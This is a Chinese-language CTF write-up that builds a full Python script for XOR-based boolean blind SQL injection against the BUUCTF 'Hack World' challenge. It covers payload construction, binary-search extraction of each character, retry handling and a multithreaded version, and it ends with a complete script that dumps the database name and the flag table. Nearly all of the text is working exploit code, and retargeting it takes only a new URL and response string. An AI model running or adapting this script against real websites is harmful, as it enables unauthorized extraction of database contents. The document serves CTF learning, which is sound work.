Python自动化破解BUUCTF Hack World异或盲注实战指南

在CTF竞赛中,Web安全题目常常涉及SQL注入漏洞的利用。传统的折半查找法虽然有效,但手工操作效率低下且容易出错。本文将带你用Python编写一个自动化脚本,专门针对BUUCTF平台上的Hack World题目中的异或盲注漏洞进行高效爆破。

1. 理解异或盲注原理与题目特征

异或盲注(XOR Blind Injection)是一种特殊的SQL注入技术,它利用数据库中的异或运算特性来推断信息。在Hack World题目中,我们发现当提交 id=0^1 时会返回"Hello, glzjin wants a girlfriend.",而 id=0^0 则返回空或错误信息。

异或运算的基本规则:

  • 0 ^ 0 = 0
  • 0 ^ 1 = 1
  • 1 ^ 0 = 1
  • 1 ^ 1 = 0

我们可以利用这个特性构造布尔条件,通过服务器响应差异来判断条件真假。例如:

# 判断数据库名长度是否大于10
payload = "0^(length(database())>10)"

如果返回特定响应,说明条件为真(1),否则为假(0)。

2. 构建自动化爆破脚本框架

我们需要创建一个Python脚本,使用requests库发送HTTP请求,并自动处理响应判断。以下是基础框架:

import requests

TARGET_URL = "http://example.com"  # 替换为实际题目URL
SUCCESS_RESPONSE = "Hello, glzjin wants a girlfriend."

def send_payload(payload):
    params = {'id': payload}
    response = requests.get(TARGET_URL, params=params)
    return SUCCESS_RESPONSE in response.text

def test_condition(condition):
    payload = f"0^({condition})"
    return send_payload(payload)

3. 实现高效字符爆破算法

手工折半查找效率低,我们可以实现自动化的二分查找算法来爆破每个字符:

def binary_search_char(subquery, index):
    low = 32  # ASCII可打印字符起始
    high = 126  # ASCII可打印字符结束
    result = None
    
    while low <= high:
        mid = (low + high) // 2
        condition = f"ascii(substr(({subquery}),{index},1))>{mid}"
        
        if test_condition(condition):
            low = mid + 1
        else:
            condition_eq = f"ascii(substr(({subquery}),{index},1))={mid}"
            if test_condition(condition_eq):
                result = chr(mid)
                break
            high = mid - 1
    
    return result

4. 自动化获取数据库信息

利用上述函数,我们可以编写获取数据库信息的通用方法:

def get_string_data(subquery, max_length=50):
    result = ""
    
    # 先确定长度
    length = binary_search_length(subquery, max_length)
    
    # 逐字符爆破
    for i in range(1, length + 1):
        char = binary_search_char(subquery, i)
        if char:
            result += char
            print(f"\rProgress: {i}/{length} - {result}", end="")
        else:
            break
    
    print()
    return result

def binary_search_length(subquery, max_length):
    low = 1
    high = max_length
    result = 1
    
    while low <= high:
        mid = (low + high) // 2
        condition = f"length(({subquery}))>{mid}"
        
        if test_condition(condition):
            low = mid + 1
        else:
            condition_eq = f"length(({subquery}))={mid}"
            if test_condition(condition_eq):
                result = mid
                break
            high = mid - 1
    
    return result

5. 实战应用:获取flag

现在我们可以直接获取flag表中的内容:

def get_flag():
    flag_query = "select(flag)from(flag)"
    flag = get_string_data(flag_query)
    print(f"\nFlag found: {flag}")
    return flag

if __name__ == "__main__":
    print("[*] Starting automated exploitation...")
    
    # 获取数据库名
    db_name = get_string_data("database()")
    print(f"[+] Database name: {db_name}")
    
    # 获取flag
    flag = get_flag()

6. 脚本优化与错误处理

为了使脚本更健壮,我们需要添加一些优化:

import time

def send_payload(payload, max_retries=3, delay=1):
    for attempt in range(max_retries):
        try:
            params = {'id': payload}
            response = requests.get(TARGET_URL, params=params, timeout=10)
            return SUCCESS_RESPONSE in response.text
        except Exception as e:
            print(f"[-] Attempt {attempt + 1} failed: {str(e)}")
            if attempt < max_retries - 1:
                time.sleep(delay)
            else:
                raise

def get_string_data(subquery, max_length=50):
    result = ""
    try:
        length = binary_search_length(subquery, max_length)
        print(f"[*] Length determined: {length}")
        
        for i in range(1, length + 1):
            char = binary_search_char(subquery, i)
            if char:
                result += char
                print(f"\rProgress: {i}/{length} - {result}", end="", flush=True)
            else:
                print(f"\n[!] Failed to get character at position {i}")
                break
    except KeyboardInterrupt:
        print("\n[!] Interrupted by user")
        if result:
            print(f"[*] Partial result: {result}")
    except Exception as e:
        print(f"\n[!] Error: {str(e)}")
    
    print()
    return result

7. 多线程加速爆破过程

对于较长的字符串,我们可以使用多线程加速爆破:

from concurrent.futures import ThreadPoolExecutor

def get_string_data_parallel(subquery, max_length=50, threads=4):
    result = [None] * max_length
    length = binary_search_length(subquery, max_length)
    print(f"[*] Length determined: {length}")
    
    def get_char(position):
        return binary_search_char(subquery, position)
    
    with ThreadPoolExecutor(max_workers=threads) as executor:
        futures = {executor.submit(get_char, i): i for i in range(1, length + 1)}
        
        for future in futures:
            position = futures[future]
            try:
                char = future.result()
                if char:
                    result[position - 1] = char
                    current = ''.join([c if c else '?' for c in result[:position]])
                    print(f"\rProgress: {position}/{length} - {current}", end="", flush=True)
            except Exception as e:
                print(f"\n[!] Error at position {position}: {str(e)}")
    
    final_result = ''.join([c for c in result if c])
    print(f"\n[+] Result: {final_result}")
    return final_result

8. 完整脚本与使用说明

将以上各部分组合起来,我们得到完整的自动化爆破脚本:

import requests
import time
from concurrent.futures import ThreadPoolExecutor

# 配置部分
TARGET_URL = "http://example.com"  # 替换为实际题目URL
SUCCESS_RESPONSE = "Hello, glzjin wants a girlfriend."
MAX_RETRIES = 3
REQUEST_DELAY = 0.5  # 防止请求过快被拦截
THREADS = 4  # 并发线程数

def send_payload(payload, max_retries=MAX_RETRIES, delay=REQUEST_DELAY):
    for attempt in range(max_retries):
        try:
            params = {'id': payload}
            response = requests.get(TARGET_URL, params=params, timeout=10)
            return SUCCESS_RESPONSE in response.text
        except Exception as e:
            print(f"[-] Attempt {attempt + 1} failed: {str(e)}")
            if attempt < max_retries - 1:
                time.sleep(delay)
            else:
                raise

def test_condition(condition):
    payload = f"0^({condition})"
    return send_payload(payload)

def binary_search_char(subquery, index):
    low = 32
    high = 126
    result = None
    
    while low <= high:
        mid = (low + high) // 2
        condition = f"ascii(substr(({subquery}),{index},1))>{mid}"
        
        if test_condition(condition):
            low = mid + 1
        else:
            condition_eq = f"ascii(substr(({subquery}),{index},1))={mid}"
            if test_condition(condition_eq):
                result = chr(mid)
                break
            high = mid - 1
    
    return result

def binary_search_length(subquery, max_length):
    low = 1
    high = max_length
    result = 1
    
    while low <= high:
        mid = (low + high) // 2
        condition = f"length(({subquery}))>{mid}"
        
        if test_condition(condition):
            low = mid + 1
        else:
            condition_eq = f"length(({subquery}))={mid}"
            if test_condition(condition_eq):
                result = mid
                break
            high = mid - 1
    
    return result

def get_string_data_parallel(subquery, max_length=50, threads=THREADS):
    result = [None] * max_length
    length = binary_search_length(subquery, max_length)
    print(f"[*] Length determined: {length}")
    
    def get_char(position):
        return binary_search_char(subquery, position)
    
    with ThreadPoolExecutor(max_workers=threads) as executor:
        futures = {executor.submit(get_char, i): i for i in range(1, length + 1)}
        
        for future in futures:
            position = futures[future]
            try:
                char = future.result()
                if char:
                    result[position - 1] = char
                    current = ''.join([c if c else '?' for c in result[:position]])
                    print(f"\rProgress: {position}/{length} - {current}", end="", flush=True)
            except Exception as e:
                print(f"\n[!] Error at position {position}: {str(e)}")
    
    final_result = ''.join([c for c in result if c])
    print(f"\n[+] Result: {final_result}")
    return final_result

def main():
    print("[*] Starting automated exploitation...")
    
    # 获取数据库名
    print("\n[*] Retrieving database name...")
    db_name = get_string_data_parallel("database()")
    print(f"[+] Database name: {db_name}")
    
    # 获取flag
    print("\n[*] Retrieving flag...")
    flag = get_string_data_parallel("select(flag)from(flag)")
    print(f"[+] Flag: {flag}")

if __name__ == "__main__":
    main()

使用说明:

  1. TARGET_URL 替换为实际题目URL
  2. 根据题目响应调整 SUCCESS_RESPONSE
  3. 可以调整 THREADS 参数控制并发数
  4. 如果遇到请求失败,可以调整 MAX_RETRIES REQUEST_DELAY

更多推荐